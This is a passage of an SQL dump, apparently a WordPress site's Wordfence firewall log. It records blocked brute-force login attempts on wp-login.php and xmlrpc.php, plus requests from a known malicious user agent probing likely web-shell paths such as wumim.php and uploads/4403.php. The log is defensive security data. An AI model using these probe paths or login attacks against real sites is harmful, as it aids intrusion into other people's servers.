User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2pzLzQwNC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14467,1704638587.759899,1704638587.700500,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wumim.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3d1bWltLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14816,1704734467.093118,1704734466.983800,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-admin/meta/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL21ldGEv\",\"category\":\"brute-force\",\"ssl\":1}'),(14619,0.000000,1704652473.912065,'\0\0\0\0\0\0\0\0\0\08-',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14620,0.000000,1704652571.188329,'\0\0\0\0\0\0\0\0\0\0\0[',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14466,1704638593.747623,1704638593.663700,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wumim.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3d1bWltLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14571,1704639044.019534,1704639043.943500,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/sitemap.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpdGVtYXAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14465,1704638602.123472,1704638602.055700,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/uploads/4403.php?ote=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZHMvNDQwMy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14464,1704638607.496634,1704638607.432200,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/uploads/4403.php?ote=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3VwbG9hZHMvNDQwMy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14618,1704652262.213796,1704652262.129900,'\0\0\0\0\0\0\0\0\0\0[\\',0,403,0,0,0,'https://tummyrevolution.com/wp-content/themes/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2luY2x1ZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14572,1704639029.059057,1704639028.968900,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/wp-plugs/jrss-widget/proxy.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvd3AtcGx1Z3MvanJzcy13aWRnZXQvcHJveHkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14463,1704638613.682951,1704638613.609600,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-login.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14460,0.000000,1704637520.542880,'\0\0\0\0\0\0\0\0\0\0Y',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14461,0.000000,1704638172.828931,'\0\0\0\0\0\0\0\0\0\0%',0,200,0,2,0,'https://tummyrevolution.com/wp-login.php','https://tummyrevolution.com','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2101.0 Safari/537.36','loginFailValidUsername',NULL,NULL),(14462,0.000000,1704638419.488641,'\0\0\0\0\0\0\0\0\0\0>f',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14458,0.000000,1704636837.168797,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14459,0.000000,1704637452.296099,'\0\0\0\0\0\0\0\0\0\0՘',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14457,0.000000,1704636757.005440,'\0\0\0\0\0\0\0\0\0\0@',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14456,0.000000,1704636430.648458,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14455,0.000000,1704635338.798891,'\0\0\0\0\0\0\0\0\0\0б',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14454,0.000000,1704634987.328494,'\0\0\0\0\0\0\0\0\0\0͹~a',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14453,0.000000,1704634668.469511,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14451,0.000000,1704633016.111197,'\0\0\0\0\0\0\0\0\0\0zb',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14452,0.000000,1704634431.366528,'\0\0\0\0\0\0\0\0\0\0k^',0,200,0,1,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4','loginFailValidUsername',NULL,NULL),(14449,0.000000,1704632293.606670,'\0\0\0\0\0\0\0\0\0\0aJ\"',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14450,0.000000,1704632857.429303,'\0\0\0\0\0\0\0\0\0\0HGL',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14448,0.000000,1704631253.855548,'\0\0\0\0\0\0\0\0\0\0qr',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:42.0) Gecko/20100101 Firefox/42.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14447,0.000000,1704630273.971693,'&\0\0\0\0\0\0$\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14444,0.000000,1704626977.907635,'\0\0\0\0\0\0\0\0\0\01Q',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14445,0.000000,1704628621.759212,'\0\0\0\0\0\0\0\0\0\0U',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14446,0.000000,1704628912.205629,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14442,0.000000,1704625647.005024,'* r\0\0\0GV\0 {',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14443,0.000000,1704625889.573460,'$\0(Bዌ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14441,0.000000,1704625335.403444,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14440,0.000000,1704625196.128620,'\0\0\0\0\0\0\0\0\0\0Dz',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14439,0.000000,1704624793.490147,'\0\0\0\0\0\0\0\0\0\0/jɆ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14436,0.000000,1704623697.079069,'\0\0\0\0\0\0\0\0\0\0`',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14437,0.000000,1704623911.789398,'\0\0\0\0\0\0\0\0\0\0g\r',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14438,0.000000,1704624344.098333,'\0\0\0\0\0\0\0\0\0\03',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14435,0.000000,1704623491.606346,'\0\0\0\0\0\0\0\0\0\01',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14434,0.000000,1704623041.405847,'\0\0\0\0\0\0\0\0\0\02> ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14433,0.000000,1704622624.488664,'\0\0\0\0\0\0\0\0\0\0|߮',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14430,0.000000,1704621756.060717,'\0\0\0\0\0\0\0\0\0\0| p',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14431,0.000000,1704622065.171797,'*\0\0\0\0\"',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14432,0.000000,1704622166.998594,'\0\0\0\0\0\0\0\0\0\0EG',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14429,0.000000,1704621310.608185,'\0\0\0\0\0\0\0\0\0\0CޓC',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14428,0.000000,1704620877.588114,'\0\0\0\0\0\0\0\0\0\0DR',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14426,0.000000,1704620477.713379,'\0\0\0\0\0\0\0\0\0\0-}',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14427,0.000000,1704620519.196908,'\0\0\0\0\0\0\0\0\0\0C',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14423,0.000000,1704619625.055053,'\0\0\0\0\0\0\0\0\0\0v',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14424,0.000000,1704620035.238292,'\0\0\0\0\0\0\0\0\0\0gZ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14425,0.000000,1704620432.267961,'&\0<\0\0\0\0<',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14420,0.000000,1704618762.120443,'\0\0\0\0\0\0\0\0\0\0m0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14421,0.000000,1704618803.284199,'\0\0\0\0\0\0\0\0\0\0#ы{',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14422,0.000000,1704619168.278343,'\0\0\0\0\0\0\0\0\0\0HGL',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14419,0.000000,1704618336.245893,'*\0ր\0 \0P\0\0\0\0\0\0ʹ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14416,0.000000,1704617175.232114,'\0\0\0\0\0\0\0\0\0\0#B',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14417,0.000000,1704617489.607143,'\0\0\0\0\0\0\0\0\0\0ɿ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14418,0.000000,1704617903.455361,'\0\0\0\0\0\0\0\0\0\0H@s',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14415,0.000000,1704617070.846874,'\0\0\0\0\0\0\0\0\0\0St',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14412,0.000000,1704616185.341682,'\0\0\0\0\0\0\0\0\0\0z\"',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14413,0.000000,1704616633.697668,'\0\0\0\0\0\0\0\0\0\0H',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14414,0.000000,1704616799.644594,'\0\0\0\0\0\0\0\0\0\0t',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14411,0.000000,1704615788.154656,'&@ W\'D\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14410,0.000000,1704615552.472334,'\0\0\0\0\0\0\0\0\0\0կB',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14409,0.000000,1704615370.026565,'\0\0\0\0\0\0\0\0\0\0ɽ<',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14408,0.000000,1704615088.464929,'\0\0\0\0\0\0\0\0\0\0b',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14407,0.000000,1704614964.865094,'&\0\0\0\0\0\nA2o',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14406,0.000000,1704614522.936786,'\0\0\0\0\0\0\0\0\0\0\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14405,0.000000,1704614116.529112,'\0\0\0\0\0\0\0\0\0\02>0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14404,0.000000,1704613948.649372,'\0\0\0\0\0\0\0\0\0\0\"A\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14403,0.000000,1704613700.441101,'\0\0\0\0\0\0\0\0\0\0;',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; 